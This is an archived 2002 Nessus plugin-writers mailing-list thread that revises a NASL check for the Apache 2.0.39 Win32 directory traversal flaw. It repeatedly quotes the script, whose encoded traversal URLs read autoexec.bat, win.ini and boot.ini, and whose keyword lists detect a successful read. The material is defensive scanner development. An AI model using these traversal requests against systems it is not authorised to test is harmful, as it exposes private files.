Mailing List Archive

Oops, sorry, this script was not reliable on WinNT
Here is a new version.
BTW, I suspect that badblue_directory_traversal.nasl may give false
negative too.

IMHO, it should look for win.ini too; and the check function should look
for more keywords:
("[fonts]" >< buf) ||
("[extensions]" >< buf) ||
("[mci extensions]" >< buf) ||
("[files]" >< buf) ||
("[Mail]" >< buf) ||

Isn't a HTTP 200 code enough to give a warning?





# This script was quicky written by Michel Arboi <arboi@bigfoot.com>
# starting from badblue_directory_traversal.nasl by SecurITeam.
#
# GPL
#
# Reference
# From:"Auriemma Luigi" <aluigi@pivx.com>
# To:bugtraq@securityfocus.com
# Subject: Apache 2.0.39 directory traversal and path disclosure bug
# Date: Fri, 16 Aug 2002 17:01:29 +0000

if(description)
{
script_id(11092);
script_version("$Revision$");
script_cve_id("CAN-2002-0661");
name["english"] = "Apache 2.0.39 Win32 directory traversal";
script_name(english:name["english"]);

desc["english"] = "
A security vulnerability in Apache 2.0.39 allows attackers to access
files that would otherwise be inaccessible using a directory
traversal attack.
A cracker may use this to read sensitive files or even executable
any command on your system.

Solution: Upgrade to Apache 2.0.40 or install it on a Unix machine
Risk factor : High";

script_description(english:desc["english"]);

summary["english"] = "Apache 2.0.39 Win32 directory traversal";

script_summary(english:summary["english"]);

script_category(ACT_GATHER_INFO);

script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
family["english"] = "CGI abuses";
script_family(english:family["english"]);
script_dependencie("find_service.nes", "no404.nasl");
script_require_ports("Services/www", 80);
exit(0);
}

# Check starts here

function check(req)
{
soc = open_sock_tcp(port);
if(! soc) return (0);

req = http_get(item:req, port:port);
send(socket:soc, data:req);
cod = recv_line(socket: soc, length: 80);
buf = recv(socket:soc, length:4096);
close(soc);
if (" 200 " >< cod)
{
security_hole(port:port);
return(1);
}
return(0);
}

port = get_kb_item("Services/www");
if(!port)port = 80;
if (! get_port_state(port)) exit(0);

cginameandpath[0] = "/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cautoexec.bat";
cginameandpath[1] = "/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini";
cginameandpath[2] = "/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cboot";
cginameandpath[3] = "";


i = 0;
for (i = 0; cginameandpath[i]; i = i + 1)
{
url = cginameandpath[i];
if(check(req:url))exit(0);
}

Le dim 18/08/2002 à 16:22, Noam Rathaus a écrit :
> One problem with this is the fact that 404 fakers (site that respond to
> everything with 200) will cause a false positive on this test.

Right, I forgot them... Is this better like this?





# This script was quicky written by Michel Arboi <arboi@bigfoot.com>
# starting from badblue_directory_traversal.nasl by SecurITeam.
#
# GPL
#
# Reference
# From:"Auriemma Luigi" <aluigi@pivx.com>
# To:bugtraq@securityfocus.com
# Subject: Apache 2.0.39 directory traversal and path disclosure bug
# Date: Fri, 16 Aug 2002 17:01:29 +0000

if(description)
{
script_id(11092);
script_version("$Revision$");
script_cve_id("CAN-2002-0661");
name["english"] = "Apache 2.0.39 Win32 directory traversal";
script_name(english:name["english"]);

desc["english"] = "
A security vulnerability in Apache 2.0.39 allows attackers to access
files that would otherwise be inaccessible using a directory
traversal attack.
A cracker may use this to read sensitive files or even executable
any command on your system.

Solution: Upgrade to Apache 2.0.40 or install it on a Unix machine
Risk factor : High";

script_description(english:desc["english"]);

summary["english"] = "Apache 2.0.39 Win32 directory traversal";

script_summary(english:summary["english"]);

script_category(ACT_GATHER_INFO);

script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
family["english"] = "CGI abuses";
script_family(english:family["english"]);
script_dependencie("find_service.nes", "no404.nasl");
script_require_ports("Services/www", 80);
exit(0);
}

# Check starts here

function check(req, quickcheck)
{
soc = open_sock_tcp(port);
if(soc)
{
req = http_get(item:req, port:port);
send(socket:soc, data:req);
cod = recv_line(socket: soc, length: 80);
buf = recv(socket:soc, length:4096);
close(soc);

if (quickcheck)
{
if (" 200 " >< cod)
{
security_hole(port);
return (1);
}
return (0);
}
if (("ECHO" >< buf) ||
("SET " >< buf) ||
("export" >< buf) ||
("EXPORT" >< buf) ||
("mode" >< buf) ||
("MODE" >< buf) ||
("doskey" >< buf) ||
("DOSKEY" >< buf) ||
("[boot loader]" >< buf) ||
("[fonts]" >< buf) ||
("[extensions]" >< buf) ||
("[mci extensions]" >< buf) ||
("[files]" >< buf) ||
("[Mail]" >< buf) )
{
security_hole(port);
return(1);
}
}
return(0);
}

port = get_kb_item("Services/www");
if(!port)port = 80;
if (! get_port_state(port)) exit(0);

cginameandpath[0] = "/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cautoexec.bat";
cginameandpath[1] = "/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini";
cginameandpath[2] = "/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cboot";
cginameandpath[3] = "";


qc=1;
n = string("www/no404/", port)
r = get_kb_item(n);
if (r) qc=0;

i = 0;
for (i = 0; cginameandpath[i]; i = i + 1)
{
url = cginameandpath[i];
if(check(req:url, quickcheck: qc))exit(0);
}

Hi,

One problem with this is the fact that 404 fakers (site that respond to
everything with 200) will cause a false positive on this test.

Thanks
Noam Rathaus
CTO
Beyond Security Ltd
http://www.SecurITeam.com
http://www.BeyondSecurity.com
----- Original Message -----
From: "Michel Arboi" <arboi@noos.fr>
To: "Nessus plugins writers" <plugins-writers@list.nessus.org>
Sent: Sunday, August 18, 2002 3:19 PM
Subject: Re: Apache Win32 directory traversal


> Oops, sorry, this script was not reliable on WinNT
> Here is a new version.
> BTW, I suspect that badblue_directory_traversal.nasl may give false
> negative too.
>
> IMHO, it should look for win.ini too; and the check function should look
> for more keywords:
> ("[fonts]" >< buf) ||
> ("[extensions]" >< buf) ||
> ("[mci extensions]" >< buf) ||
> ("[files]" >< buf) ||
> ("[Mail]" >< buf) ||
>
> Isn't a HTTP 200 code enough to give a warning?
>
>


--------------------------------------------------------------------------------


# This script was quicky written by Michel Arboi <arboi@bigfoot.com>
# starting from badblue_directory_traversal.nasl by SecurITeam.
#
# GPL
#
# Reference
# From:"Auriemma Luigi" <aluigi@pivx.com>
# To:bugtraq@securityfocus.com
# Subject: Apache 2.0.39 directory traversal and path disclosure bug
# Date: Fri, 16 Aug 2002 17:01:29 +0000

if(description)
{
script_id(11092);
script_version("$Revision$");
script_cve_id("CAN-2002-0661");
name["english"] = "Apache 2.0.39 Win32 directory traversal";
script_name(english:name["english"]);

desc["english"] = "
A security vulnerability in Apache 2.0.39 allows attackers to access
files that would otherwise be inaccessible using a directory
traversal attack.
A cracker may use this to read sensitive files or even executable
any command on your system.

Solution: Upgrade to Apache 2.0.40 or install it on a Unix machine
Risk factor : High";

script_description(english:desc["english"]);

summary["english"] = "Apache 2.0.39 Win32 directory traversal";

script_summary(english:summary["english"]);

script_category(ACT_GATHER_INFO);

script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
family["english"] = "CGI abuses";
script_family(english:family["english"]);
script_dependencie("find_service.nes", "no404.nasl");
script_require_ports("Services/www", 80);
exit(0);
}

# Check starts here

function check(req)
{
soc = open_sock_tcp(port);
if(! soc) return (0);

req = http_get(item:req, port:port);
send(socket:soc, data:req);
cod = recv_line(socket: soc, length: 80);
buf = recv(socket:soc, length:4096);
close(soc);
if (" 200 " >< cod)
{
security_hole(port:port);
return(1);
}
return(0);
}

port = get_kb_item("Services/www");
if(!port)port = 80;
if (! get_port_state(port)) exit(0);

cginameandpath[0] =
"/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cautoexec.bat";
cginameandpath[1] =
"/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini";
cginameandpath[2] =
"/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cboot";
cginameandpath[3] = "";


i = 0;
for (i = 0; cginameandpath[i]; i = i + 1)
{
url = cginameandpath[i];
if(check(req:url))exit(0);
}

Michel Arboi <arboi@noos.fr> writes:

> n = string("www/no404/", port)

Add a ';' at the end of the line -- or use the up to date CVS version.

Hi,

Beside that ';', that someone else noted. It looks ok :)

Thanks
Noam Rathaus
CTO
Beyond Security Ltd
http://www.SecurITeam.com
http://www.BeyondSecurity.com
----- Original Message -----
From: "Michel Arboi" <arboi@noos.fr>
To: "Nessus plugins writers" <plugins-writers@list.nessus.org>
Sent: Sunday, August 18, 2002 3:56 PM
Subject: Re: Apache Win32 directory traversal


Le dim 18/08/2002 à 16:22, Noam Rathaus a écrit :
> One problem with this is the fact that 404 fakers (site that respond to
> everything with 200) will cause a false positive on this test.

Right, I forgot them... Is this better like this?




--------------------------------------------------------------------------------


# This script was quicky written by Michel Arboi <arboi@bigfoot.com>
# starting from badblue_directory_traversal.nasl by SecurITeam.
#
# GPL
#
# Reference
# From:"Auriemma Luigi" <aluigi@pivx.com>
# To:bugtraq@securityfocus.com
# Subject: Apache 2.0.39 directory traversal and path disclosure bug
# Date: Fri, 16 Aug 2002 17:01:29 +0000

if(description)
{
script_id(11092);
script_version("$Revision$");
script_cve_id("CAN-2002-0661");
name["english"] = "Apache 2.0.39 Win32 directory traversal";
script_name(english:name["english"]);

desc["english"] = "
A security vulnerability in Apache 2.0.39 allows attackers to access
files that would otherwise be inaccessible using a directory
traversal attack.
A cracker may use this to read sensitive files or even executable
any command on your system.

Solution: Upgrade to Apache 2.0.40 or install it on a Unix machine
Risk factor : High";

script_description(english:desc["english"]);

summary["english"] = "Apache 2.0.39 Win32 directory traversal";

script_summary(english:summary["english"]);

script_category(ACT_GATHER_INFO);

script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
family["english"] = "CGI abuses";
script_family(english:family["english"]);
script_dependencie("find_service.nes", "no404.nasl");
script_require_ports("Services/www", 80);
exit(0);
}

# Check starts here

function check(req, quickcheck)
{
soc = open_sock_tcp(port);
if(soc)
{
req = http_get(item:req, port:port);
send(socket:soc, data:req);
cod = recv_line(socket: soc, length: 80);
buf = recv(socket:soc, length:4096);
close(soc);

if (quickcheck)
{
if (" 200 " >< cod)
{
security_hole(port);
return (1);
}
return (0);
}
if (("ECHO" >< buf) ||
("SET " >< buf) ||
("export" >< buf) ||
("EXPORT" >< buf) ||
("mode" >< buf) ||
("MODE" >< buf) ||
("doskey" >< buf) ||
("DOSKEY" >< buf) ||
("[boot loader]" >< buf) ||
("[fonts]" >< buf) ||
("[extensions]" >< buf) ||
("[mci extensions]" >< buf) ||
("[files]" >< buf) ||
("[Mail]" >< buf) )
{
security_hole(port);
return(1);
}
}
return(0);
}

port = get_kb_item("Services/www");
if(!port)port = 80;
if (! get_port_state(port)) exit(0);

cginameandpath[0] =
"/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cautoexec.bat";
cginameandpath[1] =
"/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini";
cginameandpath[2] =
"/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cboot";
cginameandpath[3] = "";


qc=1;
n = string("www/no404/", port)
r = get_kb_item(n);
if (r) qc=0;

i = 0;
for (i = 0; cginameandpath[i]; i = i + 1)
{
url = cginameandpath[i];
if(check(req:url, quickcheck: qc))exit(0);
}

"Noam Rathaus" <noamr@beyondsecurity.com> writes:

> Beside that ';', that someone else noted. It looks ok :)

I added a banner check (in the last CVS version) in case somebody
implements the work around or Nessus cannot read autoexec.bat or
win.ini for whatever reason.
I could have added
script_require_keys("www/apache");
but according to the guy who wrote the advisory, other servers are
vulnerable to the same attack. "More details to come"...

I don't know if it is _exactly_ the same and if the plugin will work
without modification.